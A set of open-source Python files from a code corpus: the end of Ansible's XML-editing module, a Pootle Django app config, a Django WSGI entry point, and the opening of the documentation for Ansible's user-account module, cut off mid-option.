- This parameter is required, unless C(path) is given.
type: str
required: yes
xpath:
description:
- A valid XPath expression describing the item(s) you want to manipulate.
- Operates on the document root, C(/), by default.
type: str
namespaces:
description:
- The namespace C(prefix:uri) mapping for the XPath expression.
- Needs to be a C(dict), not a C(list) of items.
type: dict
state:
description:
- Set or remove an xpath selection (node(s), attribute(s)).
type: str
choices: [ absent, present ]
default: present
aliases: [ ensure ]
attribute:
description:
- The attribute to select when using parameter C(value).
- This is a string, not prepended with C(@).
type: raw
value:
description:
- Desired state of the selected attribute.
- Either a string, or to unset a value, the Python C(None) keyword (YAML Equivalent, C(null)).
- Elements default to no value (but present).
- Attributes default to an empty string.
type: raw
add_children:
description:
- Add additional child-element(s) to a selected element for a given C(xpath).
- Child elements must be given in a list and each item may be either a string
(eg. C(children=ansible) to add an empty C(<ansible/>) child element),
or a hash where the key is an element name and the value is the element value.
- This parameter requires C(xpath) to be set.
type: list
set_children:
description:
- Set the child-element(s) of a selected element for a given C(xpath).
- Removes any existing children.
- Child elements must be specified as in C(add_children).
- This parameter requires C(xpath) to be set.
type: list
count:
description:
- Search for a given C(xpath) and provide the count of any matches.
- This parameter requires C(xpath) to be set.
type: bool
default: no
print_match:
description:
- Search for a given C(xpath) and print out any matches.
- This parameter requires C(xpath) to be set.
type: bool
default: no
pretty_print:
description:
- Pretty print XML output.
type: bool
default: no
content:
description:
- Search for a given C(xpath) and get content.
- This parameter requires C(xpath) to be set.
type: str
choices: [ attribute, text ]
input_type:
description:
- Type of input for C(add_children) and C(set_children).
type: str
choices: [ xml, yaml ]
default: yaml
backup:
description:
- Create a backup file including the timestamp information so you can get
the original file back if you somehow clobbered it incorrectly.
type: bool
default: no
strip_cdata_tags:
description:
- Remove CDATA tags surrounding text values.
- Note that this might break your XML file if text values contain characters that could be interpreted as XML.
type: bool
default: no
version_added: '2.7'
insertbefore:
description:
- Add additional child-element(s) before the first selected element for a given C(xpath).
- Child elements must be given in a list and each item may be either a string
(eg. C(children=ansible) to add an empty C(<ansible/>) child element),
or a hash where the key is an element name and the value is the element value.
- This parameter requires C(xpath) to be set.
type: bool
default: no
version_added: '2.8'
insertafter:
description:
- Add additional child-element(s) after the last selected element for a given C(xpath).
- Child elements must be given in a list and each item may be either a string
(eg. C(children=ansible) to add an empty C(<ansible/>) child element),
or a hash where the key is an element name and the value is the element value.
- This parameter requires C(xpath) to be set.
type: bool
default: no
version_added: '2.8'
requirements:
- lxml >= 2.3.0
notes:
- Use the C(--check) and C(--diff) options when testing your expressions.
- The diff output is automatically pretty-printed, so may not reflect the actual file content, only the file structure.
- This module does not handle complicated xpath expressions, so limit xpath selectors to simple expressions.
- Beware that in case your XML elements are namespaced, you need to use the C(namespaces) parameter, see the examples.
- Namespaces prefix should be used for all children of an element where namespace is defined, unless another namespace is defined for them.
seealso:
- name: Xml module development community wiki
description: More information related to the development of this xml module.
link: https://github.com/ansible/community/wiki/Module:-xml
- name: Introduction to XPath
description: A brief tutorial on XPath (w3schools.com).
link: https://www.w3schools.com/xml/xpath_intro.asp
- name: XPath Reference document
description: The reference documentation on XSLT/XPath (developer.mozilla.org).
link: https://developer.mozilla.org/en-US/docs/Web/XPath
author:
- Tim Bielawa (@tbielawa)
- Magnus Hedemark (@magnus919)
- Dag Wieers (@dagwieers)
'''
EXAMPLES = r'''
# Consider the following XML file:
#
# <business type="bar">
# <name>Tasty Beverage Co.</name>
# <beers>
# <beer>Rochefort 10</beer>
# <beer>St. Bernardus Abbot 12</beer>
# <beer>Schlitz</beer>
# </beers>
# <rating subjective="true">10</rating>
# <website>
# <mobilefriendly/>
# <address>http://tastybeverageco.com</address>
# </website>
# </business>
- name: Remove the 'subjective' attribute of the 'rating' element
xml:
path: /foo/bar.xml
xpath: /business/rating/@subjective
state: absent
- name: Set the rating to '11'
xml:
path: /foo/bar.xml
xpath: /business/rating
value: 11
# Retrieve and display the number of nodes
- name: Get count of 'beers' nodes
xml:
path: /foo/bar.xml
xpath: /business/beers/beer
count: yes
register: hits
- debug:
var: hits.count
# Example where parent XML nodes are created automatically
- name: Add a 'phonenumber' element to the 'business' element
xml:
path: /foo/bar.xml
xpath: /business/phonenumber
value: 555-555-1234
- name: Add several more beers to the 'beers' element
xml:
path: /foo/bar.xml
xpath: /business/beers
add_children:
- beer: Old Rasputin
- beer: Old Motor Oil
- beer: Old Curmudgeon
- name: Add several more beers to the 'beers' element and add them before the 'Rochefort 10' element
xml:
path: /foo/bar.xml
xpath: '/business/beers/beer[text()=\"Rochefort 10\"]'
insertbefore: yes
add_children:
- beer: Old Rasputin
- beer: Old Motor Oil
- beer: Old Curmudgeon
# NOTE: The 'state' defaults to 'present' and 'value' defaults to 'null' for elements
- name: Add a 'validxhtml' element to the 'website' element
xml:
path: /foo/bar.xml
xpath: /business/website/validxhtml
- name: Add an empty 'validatedon' attribute to the 'validxhtml' element
xml:
path: /foo/bar.xml
xpath: /business/website/validxhtml/@validatedon
- name: Add or modify an attribute, add element if needed
xml:
path: /foo/bar.xml
xpath: /business/website/validxhtml
attribute: validatedon
value: 1976-08-05
# How to read an attribute value and access it in Ansible
- name: Read attribute value
xml:
path: /foo/bar.xml
xpath: /business/website/validxhtml
content: attribute
attribute: validatedon
register: xmlresp
- name: Show attribute value
debug:
var: xmlresp.matches[0].validxhtml.validatedon
- name: Remove all children from the 'website' element (option 1)
xml:
path: /foo/bar.xml
xpath: /business/website/*
state: absent
- name: Remove all children from the 'website' element (option 2)
xml:
path: /foo/bar.xml
xpath: /business/website
children: []
# In case of namespaces, like in below XML, they have to be explicitely stated.
#
# <foo xmlns="http://x.test" xmlns:attr="http://z.test">
# <bar>
# <baz xmlns="http://y.test" attr:my_namespaced_attribute="true" />
# </bar>
# </foo>
# NOTE: There is the prefix 'x' in front of the 'bar' element, too.
- name: Set namespaced '/x:foo/x:bar/y:baz/@z:my_namespaced_attribute' to 'false'
xml:
path: foo.xml
xpath: /x:foo/x:bar/y:baz
namespaces:
x: http://x.test
y: http://y.test
z: http://z.test
attribute: z:my_namespaced_attribute
value: 'false'
'''
RETURN = r'''
actions:
description: A dictionary with the original xpath, namespaces and state.
type: dict
returned: success
sample: {xpath: xpath, namespaces: [namespace1, namespace2], state=present}
backup_file:
description: The name of the backup file that was created
type: str
returned: when backup=yes
sample: /path/to/file.xml.1942.2017-08-24@14:16:01~
count:
description: The count of xpath matches.
type: int
returned: when parameter 'count' is set
sample: 2
matches:
description: The xpath matches found.
type: list
returned: when parameter 'print_match' is set
msg:
description: A message related to the performed action(s).
type: str
returned: always
xmlstring:
description: An XML string of the resulting output.
type: str
returned: when parameter 'xmlstring' is set
'''
import copy
import json
import os
import re
import traceback
from distutils.version import LooseVersion
from io import BytesIO
try:
from lxml import etree, objectify
HAS_LXML = True
except ImportError:
HAS_LXML = False
from ansible.module_utils.basic import AnsibleModule, json_dict_bytes_to_unicode
from ansible.module_utils.six import iteritems, string_types
from ansible.module_utils._text import to_bytes, to_native
from ansible.module_utils.common._collections_compat import MutableMapping
_IDENT = r"[a-zA-Z-][a-zA-Z0-9_\-\.]*"
_NSIDENT = _IDENT + "|" + _IDENT + ":" + _IDENT
# Note: we can't reasonably support the 'if you need to put both ' and " in a string, concatenate
# strings wrapped by the other delimiter' XPath trick, especially as simple XPath.
_XPSTR = "('(?:.*)'|\"(?:.*)\")"
_RE_SPLITSIMPLELAST = re.compile("^(.*)/(" + _NSIDENT + ")$")
_RE_SPLITSIMPLELASTEQVALUE = re.compile("^(.*)/(" + _NSIDENT + ")/text\\(\\)=" + _XPSTR + "$")
_RE_SPLITSIMPLEATTRLAST = re.compile("^(.*)/(@(?:" + _NSIDENT + "))$")
_RE_SPLITSIMPLEATTRLASTEQVALUE = re.compile("^(.*)/(@(?:" + _NSIDENT + "))=" + _XPSTR + "$")
_RE_SPLITSUBLAST = re.compile("^(.*)/(" + _NSIDENT + ")\\[(.*)\\]$")
_RE_SPLITONLYEQVALUE = re.compile("^(.*)/text\\(\\)=" + _XPSTR + "$")
def has_changed(doc):
orig_obj = etree.tostring(objectify.fromstring(etree.tostring(orig_doc)))
obj = etree.tostring(objectify.fromstring(etree.tostring(doc)))
return (orig_obj != obj)
def do_print_match(module, tree, xpath, namespaces):
match = tree.xpath(xpath, namespaces=namespaces)
match_xpaths = []
for m in match:
match_xpaths.append(tree.getpath(m))
match_str = json.dumps(match_xpaths)
msg = "selector '%s' match: %s" % (xpath, match_str)
finish(module, tree, xpath, namespaces, changed=False, msg=msg)
def count_nodes(module, tree, xpath, namespaces):
""" Return the count of nodes matching the xpath """
hits = tree.xpath("count(/%s)" % xpath, namespaces=namespaces)
msg = "found %d nodes" % hits
finish(module, tree, xpath, namespaces, changed=False, msg=msg, hitcount=int(hits))
def is_node(tree, xpath, namespaces):
""" Test if a given xpath matches anything and if that match is a node.
For now we just assume you're only searching for one specific thing."""
if xpath_matches(tree, xpath, namespaces):
# OK, it found something
match = tree.xpath(xpath, namespaces=namespaces)
if isinstance(match[0], etree._Element):
return True
return False
def is_attribute(tree, xpath, namespaces):
""" Test if a given xpath matches and that match is an attribute
An xpath attribute search will only match one item"""
if xpath_matches(tree, xpath, namespaces):
match = tree.xpath(xpath, namespaces=namespaces)
if isinstance(match[0], etree._ElementStringResult):
return True
elif isinstance(match[0], etree._ElementUnicodeResult):
return True
return False
def xpath_matches(tree, xpath, namespaces):
""" Test if a node exists """
if tree.xpath(xpath, namespaces=namespaces):
return True
return False
def delete_xpath_target(module, tree, xpath, namespaces):
""" Delete an attribute or element from a tree """
try:
for result in tree.xpath(xpath, namespaces=namespaces):
# Get the xpath for this result
if is_attribute(tree, xpath, namespaces):
# Delete an attribute
parent = result.getparent()
# Pop this attribute match out of the parent
# node's 'attrib' dict by using this match's
# 'attrname' attribute for the key
parent.attrib.pop(result.attrname)
elif is_node(tree, xpath, namespaces):
# Delete an element
result.getparent().remove(result)
else:
raise Exception("Impossible error")
except Exception as e:
module.fail_json(msg="Couldn't delete xpath target: %s (%s)" % (xpath, e))
else:
finish(module, tree, xpath, namespaces, changed=True)
def replace_children_of(children, match):
for element in match.getchildren():
match.remove(element)
match.extend(children)
def set_target_children_inner(module, tree, xpath, namespaces, children, in_type):
matches = tree.xpath(xpath, namespaces=namespaces)
# Create a list of our new children
children = children_to_nodes(module, children, in_type)
children_as_string = [etree.tostring(c) for c in children]
changed = False
# xpaths always return matches as a list, so....
for match in matches:
# Check if elements differ
if len(match.getchildren()) == len(children):
for idx, element in enumerate(match.getchildren()):
if etree.tostring(element) != children_as_string[idx]:
replace_children_of(children, match)
changed = True
break
else:
replace_children_of(children, match)
changed = True
return changed
def set_target_children(module, tree, xpath, namespaces, children, in_type):
changed = set_target_children_inner(module, tree, xpath, namespaces, children, in_type)
# Write it out
finish(module, tree, xpath, namespaces, changed=changed)
def add_target_children(module, tree, xpath, namespaces, children, in_type, insertbefore, insertafter):
if is_node(tree, xpath, namespaces):
new_kids = children_to_nodes(module, children, in_type)
if insertbefore or insertafter:
insert_target_children(tree, xpath, namespaces, new_kids, insertbefore, insertafter)
else:
for node in tree.xpath(xpath, namespaces=namespaces):
node.extend(new_kids)
finish(module, tree, xpath, namespaces, changed=True)
else:
finish(module, tree, xpath, namespaces)
def insert_target_children(tree, xpath, namespaces, children, insertbefore, insertafter):
"""
Insert the given children before or after the given xpath. If insertbefore is True, it is inserted before the
first xpath hit, with insertafter, it is inserted after the last xpath hit.
"""
insert_target = tree.xpath(xpath, namespaces=namespaces)
loc_index = 0 if insertbefore else -1
index_in_parent = insert_target[loc_index].getparent().index(insert_target[loc_index])
parent = insert_target[0].getparent()
if insertafter:
index_in_parent += 1
for child in children:
parent.insert(index_in_parent, child)
index_in_parent += 1
def _extract_xpstr(g):
return g[1:-1]
def split_xpath_last(xpath):
"""split an XPath of the form /foo/bar/baz into /foo/bar and baz"""
xpath = xpath.strip()
m = _RE_SPLITSIMPLELAST.match(xpath)
if m:
# requesting an element to exist
return (m.group(1), [(m.group(2), None)])
m = _RE_SPLITSIMPLELASTEQVALUE.match(xpath)
if m:
# requesting an element to exist with an inner text
return (m.group(1), [(m.group(2), _extract_xpstr(m.group(3)))])
m = _RE_SPLITSIMPLEATTRLAST.match(xpath)
if m:
# requesting an attribute to exist
return (m.group(1), [(m.group(2), None)])
m = _RE_SPLITSIMPLEATTRLASTEQVALUE.match(xpath)
if m:
# requesting an attribute to exist with a value
return (m.group(1), [(m.group(2), _extract_xpstr(m.group(3)))])
m = _RE_SPLITSUBLAST.match(xpath)
if m:
content = [x.strip() for x in m.group(3).split(" and ")]
return (m.group(1), [('/' + m.group(2), content)])
m = _RE_SPLITONLYEQVALUE.match(xpath)
if m:
# requesting a change of inner text
return (m.group(1), [("", _extract_xpstr(m.group(2)))])
return (xpath, [])
def nsnameToClark(name, namespaces):
if ":" in name:
(nsname, rawname) = name.split(":")
# return "{{%s}}%s" % (namespaces[nsname], rawname)
return "{{{0}}}{1}".format(namespaces[nsname], rawname)
# no namespace name here
return name
def check_or_make_target(module, tree, xpath, namespaces):
(inner_xpath, changes) = split_xpath_last(xpath)
if (inner_xpath == xpath) or (changes is None):
module.fail_json(msg="Can't process Xpath %s in order to spawn nodes! tree is %s" %
(xpath, etree.tostring(tree, pretty_print=True)))
return False
changed = False
if not is_node(tree, inner_xpath, namespaces):
changed = check_or_make_target(module, tree, inner_xpath, namespaces)
# we test again after calling check_or_make_target
if is_node(tree, inner_xpath, namespaces) and changes:
for (eoa, eoa_value) in changes:
if eoa and eoa[0] != '@' and eoa[0] != '/':
# implicitly creating an element
new_kids = children_to_nodes(module, [nsnameToClark(eoa, namespaces)], "yaml")
if eoa_value:
for nk in new_kids:
nk.text = eoa_value
for node in tree.xpath(inner_xpath, namespaces=namespaces):
node.extend(new_kids)
changed = True
# module.fail_json(msg="now tree=%s" % etree.tostring(tree, pretty_print=True))
elif eoa and eoa[0] == '/':
element = eoa[1:]
new_kids = children_to_nodes(module, [nsnameToClark(element, namespaces)], "yaml")
for node in tree.xpath(inner_xpath, namespaces=namespaces):
node.extend(new_kids)
for nk in new_kids:
for subexpr in eoa_value:
# module.fail_json(msg="element=%s subexpr=%s node=%s now tree=%s" %
# (element, subexpr, etree.tostring(node, pretty_print=True), etree.tostring(tree, pretty_print=True))
check_or_make_target(module, nk, "./" + subexpr, namespaces)
changed = True
# module.fail_json(msg="now tree=%s" % etree.tostring(tree, pretty_print=True))
elif eoa == "":
for node in tree.xpath(inner_xpath, namespaces=namespaces):
if (node.text != eoa_value):
node.text = eoa_value
changed = True
elif eoa and eoa[0] == '@':
attribute = nsnameToClark(eoa[1:], namespaces)
for element in tree.xpath(inner_xpath, namespaces=namespaces):
changing = (attribute not in element.attrib or element.attrib[attribute] != eoa_value)
if changing:
changed = changed or changing
if eoa_value is None:
value = ""
else:
value = eoa_value
element.attrib[attribute] = value
# module.fail_json(msg="arf %s changing=%s as curval=%s changed tree=%s" %
# (xpath, changing, etree.tostring(tree, changing, element[attribute], pretty_print=True)))
else:
module.fail_json(msg="unknown tree transformation=%s" % etree.tostring(tree, pretty_print=True))
return changed
def ensure_xpath_exists(module, tree, xpath, namespaces):
changed = False
if not is_node(tree, xpath, namespaces):
changed = check_or_make_target(module, tree, xpath, namespaces)
finish(module, tree, xpath, namespaces, changed)
def set_target_inner(module, tree, xpath, namespaces, attribute, value):
changed = False
try:
if not is_node(tree, xpath, namespaces):
changed = check_or_make_target(module, tree, xpath, namespaces)
except Exception as e:
missing_namespace = ""
# NOTE: This checks only the namespaces defined in root element!
# TODO: Implement a more robust check to check for child namespaces' existance
if tree.getroot().nsmap and ":" not in xpath:
missing_namespace = "XML document has namespace(s) defined, but no namespace prefix(es) used in xpath!\n"
module.fail_json(msg="%sXpath %s causes a failure: %s\n -- tree is %s" %
(missing_namespace, xpath, e, etree.tostring(tree, pretty_print=True)), exception=traceback.format_exc())
if not is_node(tree, xpath, namespaces):
module.fail_json(msg="Xpath %s does not reference a node! tree is %s" %
(xpath, etree.tostring(tree, pretty_print=True)))
for element in tree.xpath(xpath, namespaces=namespaces):
if not attribute:
changed = changed or (element.text != value)
if element.text != value:
element.text = value
else:
changed = changed or (element.get(attribute) != value)
if ":" in attribute:
attr_ns, attr_name = attribute.split(":")
# attribute = "{{%s}}%s" % (namespaces[attr_ns], attr_name)
attribute = "{{{0}}}{1}".format(namespaces[attr_ns], attr_name)
if element.get(attribute) != value:
element.set(attribute, value)
return changed
def set_target(module, tree, xpath, namespaces, attribute, value):
changed = set_target_inner(module, tree, xpath, namespaces, attribute, value)
finish(module, tree, xpath, namespaces, changed)
def get_element_text(module, tree, xpath, namespaces):
if not is_node(tree, xpath, namespaces):
module.fail_json(msg="Xpath %s does not reference a node!" % xpath)
elements = []
for element in tree.xpath(xpath, namespaces=namespaces):
elements.append({element.tag: element.text})
finish(module, tree, xpath, namespaces, changed=False, msg=len(elements), hitcount=len(elements), matches=elements)
def get_element_attr(module, tree, xpath, namespaces):
if not is_node(tree, xpath, namespaces):
module.fail_json(msg="Xpath %s does not reference a node!" % xpath)
elements = []
for element in tree.xpath(xpath, namespaces=namespaces):
child = {}
for key in element.keys():
value = element.get(key)
child.update({key: value})
elements.append({element.tag: child})
finish(module, tree, xpath, namespaces, changed=False, msg=len(elements), hitcount=len(elements), matches=elements)
def child_to_element(module, child, in_type):
if in_type == 'xml':
infile = BytesIO(to_bytes(child, errors='surrogate_or_strict'))
try:
parser = etree.XMLParser()
node = etree.parse(infile, parser)
return node.getroot()
except etree.XMLSyntaxError as e:
module.fail_json(msg="Error while parsing child element: %s" % e)
elif in_type == 'yaml':
if isinstance(child, string_types):
return etree.Element(child)
elif isinstance(child, MutableMapping):
if len(child) > 1:
module.fail_json(msg="Can only create children from hashes with one key")
(key, value) = next(iteritems(child))
if isinstance(value, MutableMapping):
children = value.pop('_', None)
node = etree.Element(key, value)
if children is not None:
if not isinstance(children, list):
module.fail_json(msg="Invalid children type: %s, must be list." % type(children))
subnodes = children_to_nodes(module, children)
node.extend(subnodes)
else:
node = etree.Element(key)
node.text = value
return node
else:
module.fail_json(msg="Invalid child type: %s. Children must be either strings or hashes." % type(child))
else:
module.fail_json(msg="Invalid child input type: %s. Type must be either xml or yaml." % in_type)
def children_to_nodes(module=None, children=None, type='yaml'):
"""turn a str/hash/list of str&hash into a list of elements"""
children = [] if children is None else children
return [child_to_element(module, child, type) for child in children]
def make_pretty(module, tree):
xml_string = etree.tostring(tree, xml_declaration=True, encoding='UTF-8', pretty_print=module.params['pretty_print'])
result = dict(
changed=False,
)
if module.params['path']:
xml_file = module.params['path']
with open(xml_file, 'rb') as xml_content:
if xml_string != xml_content.read():
result['changed'] = True
if not module.check_mode:
if module.params['backup']:
result['backup_file'] = module.backup_local(module.params['path'])
tree.write(xml_file, xml_declaration=True, encoding='UTF-8', pretty_print=module.params['pretty_print'])
elif module.params['xmlstring']:
result['xmlstring'] = xml_string
# NOTE: Modifying a string is not considered a change !
if xml_string != module.params['xmlstring']:
result['changed'] = True
module.exit_json(**result)
def finish(module, tree, xpath, namespaces, changed=False, msg='', hitcount=0, matches=tuple()):
result = dict(
actions=dict(
xpath=xpath,
namespaces=namespaces,
state=module.params['state']
),
changed=has_changed(tree),
)
if module.params['count'] or hitcount:
result['count'] = hitcount
if module.params['print_match'] or matches:
result['matches'] = matches
if msg:
result['msg'] = msg
if result['changed']:
if module._diff:
result['diff'] = dict(
before=etree.tostring(orig_doc, xml_declaration=True, encoding='UTF-8', pretty_print=True),
after=etree.tostring(tree, xml_declaration=True, encoding='UTF-8', pretty_print=True),
)
if module.params['path'] and not module.check_mode:
if module.params['backup']:
result['backup_file'] = module.backup_local(module.params['path'])
tree.write(module.params['path'], xml_declaration=True, encoding='UTF-8', pretty_print=module.params['pretty_print'])
if module.params['xmlstring']:
result['xmlstring'] = etree.tostring(tree, xml_declaration=True, encoding='UTF-8', pretty_print=module.params['pretty_print'])
module.exit_json(**result)
def main():
module = AnsibleModule(
argument_spec=dict(
path=dict(type='path', aliases=['dest', 'file']),
xmlstring=dict(type='str'),
xpath=dict(type='str'),
namespaces=dict(type='dict', default={}),
state=dict(type='str', default='present', choices=['absent', 'present'], aliases=['ensure']),
value=dict(type='raw'),
attribute=dict(type='raw'),
add_children=dict(type='list'),
set_children=dict(type='list'),
count=dict(type='bool', default=False),
print_match=dict(type='bool', default=False),
pretty_print=dict(type='bool', default=False),
content=dict(type='str', choices=['attribute', 'text']),
input_type=dict(type='str', default='yaml', choices=['xml', 'yaml']),
backup=dict(type='bool', default=False),
strip_cdata_tags=dict(type='bool', default=False),
insertbefore=dict(type='bool', default=False),
insertafter=dict(type='bool', default=False),
),
supports_check_mode=True,
# TODO: Implement this as soon as #28662 (required_by functionality) is merged
# required_by=dict(
# add_children=['xpath'],
# attribute=['value'],
# set_children=['xpath'],
# value=['xpath'],
# ),
required_if=[
['content', 'attribute', ['xpath']],
['content', 'text', ['xpath']],
['count', True, ['xpath']],
['print_match', True, ['xpath']],
['insertbefore', True, ['xpath']],
['insertafter', True, ['xpath']],
],
required_one_of=[
['path', 'xmlstring'],
['add_children', 'content', 'count', 'pretty_print', 'print_match', 'set_children', 'value'],
],
mutually_exclusive=[
['add_children', 'content', 'count', 'print_match', 'set_children', 'value'],
['path', 'xmlstring'],
['insertbefore', 'insertafter'],
],
)
xml_file = module.params['path']
xml_string = module.params['xmlstring']
xpath = module.params['xpath']
namespaces = module.params['namespaces']
state = module.params['state']
value = json_dict_bytes_to_unicode(module.params['value'])
attribute = module.params['attribute']
set_children = json_dict_bytes_to_unicode(module.params['set_children'])
add_children = json_dict_bytes_to_unicode(module.params['add_children'])
pretty_print = module.params['pretty_print']
content = module.params['content']
input_type = module.params['input_type']
print_match = module.params['print_match']
count = module.params['count']
backup = module.params['backup']
strip_cdata_tags = module.params['strip_cdata_tags']
insertbefore = module.params['insertbefore']
insertafter = module.params['insertafter']
# Check if we have lxml 2.3.0 or newer installed
if not HAS_LXML:
module.fail_json(msg='The xml ansible module requires the lxml python library installed on the managed machine')
elif LooseVersion('.'.join(to_native(f) for f in etree.LXML_VERSION)) < LooseVersion('2.3.0'):
module.fail_json(msg='The xml ansible module requires lxml 2.3.0 or newer installed on the managed machine')
elif LooseVersion('.'.join(to_native(f) for f in etree.LXML_VERSION)) < LooseVersion('3.0.0'):
module.warn('Using lxml version lower than 3.0.0 does not guarantee predictable element attribute order.')
# Check if the file exists
if xml_string:
infile = BytesIO(to_bytes(xml_string, errors='surrogate_or_strict'))
elif os.path.isfile(xml_file):
infile = open(xml_file, 'rb')
else:
module.fail_json(msg="The target XML source '%s' does not exist." % xml_file)
# Parse and evaluate xpath expression
if xpath is not None:
try:
etree.XPath(xpath)
except etree.XPathSyntaxError as e:
module.fail_json(msg="Syntax error in xpath expression: %s (%s)" % (xpath, e))
except etree.XPathEvalError as e:
module.fail_json(msg="Evaluation error in xpath expression: %s (%s)" % (xpath, e))
# Try to parse in the target XML file
try:
parser = etree.XMLParser(remove_blank_text=pretty_print, strip_cdata=strip_cdata_tags)
doc = etree.parse(infile, parser)
except etree.XMLSyntaxError as e:
module.fail_json(msg="Error while parsing document: %s (%s)" % (xml_file or 'xml_string', e))
# Ensure we have the original copy to compare
global orig_doc
orig_doc = copy.deepcopy(doc)
if print_match:
do_print_match(module, doc, xpath, namespaces)
if count:
count_nodes(module, doc, xpath, namespaces)
if content == 'attribute':
get_element_attr(module, doc, xpath, namespaces)
elif content == 'text':
get_element_text(module, doc, xpath, namespaces)
# File exists:
if state == 'absent':
# - absent: delete xpath target
delete_xpath_target(module, doc, xpath, namespaces)
# - present: carry on
# children && value both set?: should have already aborted by now
# add_children && set_children both set?: should have already aborted by now
# set_children set?
if set_children:
set_target_children(module, doc, xpath, namespaces, set_children, input_type)
# add_children set?
if add_children:
add_target_children(module, doc, xpath, namespaces, add_children, input_type, insertbefore, insertafter)
# No?: Carry on
# Is the xpath target an attribute selector?
if value is not None:
set_target(module, doc, xpath, namespaces, attribute, value)
# If an xpath was provided, we need to do something with the data
if xpath is not None:
ensure_xpath_exists(module, doc, xpath, namespaces)
# Otherwise only reformat the xml data?
if pretty_print:
make_pretty(module, doc)
module.fail_json(msg="Don't know what to do")
if __name__ == '__main__':
main()
| valentin-krasontovitsch/ansible | lib/ansible/modules/files/xml.py | Python | gpl-3.0 | 35,343 |
# -*- coding: utf-8 -*-
#
# Copyright (C) Pootle contributors.
#
# This file is a part of the Pootle project. It is distributed under the GPL3
# or later license. See the LICENSE file for a copy of the license and the
# AUTHORS file for copyright and authorship information.
import importlib
from django.apps import AppConfig
class PootleLogConfig(AppConfig):
name = "pootle_log"
verbose_name = "Pootle Log"
version = "0.1.1"
def ready(self):
importlib.import_module("pootle_log.getters")
| unho/pootle | pootle/apps/pootle_log/apps.py | Python | gpl-3.0 | 519 |
"""
WSGI config for todolist project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "todolist.settings")
application = get_wsgi_application()
| kommado/serious-integration | todolist/todolist/wsgi.py | Python | gpl-3.0 | 393 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2012, Stephen Fromm <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = r'''
module: user
version_added: "0.2"
short_description: Manage user accounts
description:
- Manage user accounts and user attributes.
- For Windows targets, use the M(win_user) module instead.
options:
name:
description:
- Name of the user to create, remove or modify.
type: str
required: true
aliases: [ user ]
uid:
description:
- Optionally sets the I(UID) of the user.
type: int
comment:
description:
- Optionally sets the description (aka I(GECOS)) of user account.
type: str
hidden:
description:
- macOS only, optionally hide the user from the login window and system preferences.
- The default will be C(yes) if the I(system) option is used.
type: bool
version_added: "2.6"
non_unique:
description:
- Optionally when used with the -u option, this option allows to change the user ID to a non-unique value.
type: bool
default: no
version_added: "1.1"
seuser:
description:
- Optionally sets the seuser type (user_u) on selinux enabled systems.
type: str
version_added: "2.1"
group:
description:
- Optionally sets the user's primary group (takes a group name).
type: str
groups:
description:
- List of groups user will be added to. When set to an empty string C(''),
C(null), or C(~), the user is removed from all groups except the
primary group. (C(~) means C(null) in YAML)
- Before Ansible 2.3, the only input format allowed was a comma separated string.
type: list
append:
description:
- If C(yes), add the user to the groups specified in C(groups).
- If C(no), user will only be added to the groups specified in C(groups),
removing them from all other groups.
type: bool
default: no
shell:
description:
- Optionally set the user's shell.
- On macOS, before Ansible 2.5, the default shell for non-system users was C(/usr/bin/false).
Since Ansible 2.5, the default shell for non-system users on macOS is C(/bin/bash).
- On other operating systems, the default shell is determined by the underlying tool being
used. See Notes for details.
type: str
home:
description:
- Optionally set the user's home directory.
type: path
skeleton:
description:
- Optionally set a home skeleton directory.
- Requires C(create_home) option!
type: str
version_added: "2.0"
password:
description:
- Optionally set the user's password to this crypted value.
- On macOS systems, this value has to be cleartext. Beware of security issues.
- To create a disabled account on Linux systems, set this to C('!') or C('*').
- See U(https://docs.ansible.com/ansible/faq.html#how-do-i-generate-crypted-passwords-for-the-user-module)
for details on various ways to generate these password values.
type: str
state:
description:
- Whether the account should exist or not, taking action if the state is different from what is stated.
type: str
choices: [ absent, present ]
default: present
create_home:
description:
- Unless set to C(no), a home directory will be made for the user
when the account is created or if the home directory does not exist.
- Changed from C(createhome) to C(create_home) in Ansible 2.5.
type: bool
default: yes
aliases: [ createhome ]
move_home:
description:
- "If set to C(yes) when used with C(home: ), attempt to move the user's old home
directory to the specified directory if it isn't there already and the old home exists."
type: bool
default: no
system:
description:
- When creating an account C(state=present), setting this to C(yes) makes the user a system account.
- This setting cannot be changed on existing users.
type: bool
default: no
force:
description:
- This only affects C(state=absent), it forces removal of the user and associated directories on supported platforms.
- The behavior is the same as C(userdel --force), check the man page for C(userdel) on your system for details and support.
- When used with C(generate_ssh_key=yes) this forces an existing key to be overwritten.
type: bool
default: no
remove:
description:
- This only affects C(state=absent), it attempts to remove directories associated with the user.
- The behavior is the same as C(userdel --remove), check the man page for details and support.
type: bool
default: no
login_class:
description:
- Optionally sets the user's login class, a feature of most BSD OSs.
type: str
generate_ssh_key:
description:
- Whether to generate a SSH key for the user in question.
- This will B(not) overwrite an existing SSH key unless used with C(force=yes).
type: bool
default: no
version_added: "0.9"
ssh_key_bits:
description:
- Optionally specify number of bits in SSH key to create.
type: int
default: default set by ssh-keygen
version_added: "0.9"
ssh_key_type:
description:
- Optionally specify the type of SSH key to generate.
- Available SSH key types will depend on implementation
present on target host.
type: str
default: rsa
version_added: "0.9"
ssh_key_file:
description:
- Optionally specify the SSH key filename.
- If this is a relative filename then it will be relative to the user's home directory.
- This parameter defaults to I(.ssh/id_rsa).
type: path
version_added: "0.9"
ssh_key_comment:
description:
- Optionally define the comment for the SSH key.
type: str
default: ansible-generated on $HOSTNAME
version_added: "0.9"
ssh_key_passphrase:
description:
- Set a passphrase for the SSH key.
- If no passphrase is provided, the SSH key will default to having no passphrase.
type: str
version_added: "0.9"
update_password:
description:
- C(always) will update passwords if they differ.
- C(on_create) will only set the password for newly created users.
type: str
choices: [ always, on_create ]
default: always
version_added: "1.3"
expires:
description:
- An expiry time for the user in epoch, it will be ignored on platforms that do not support this.
- Currently supported on GNU/Linux, FreeBSD, and DragonFlyBSD.
- Since Ansible 2.6 you can remove the expiry time specify a negative value.
Currently supported on GNU/Linux and FreeBSD.
type: float
version_added: "1.9"
password_lock:
description:
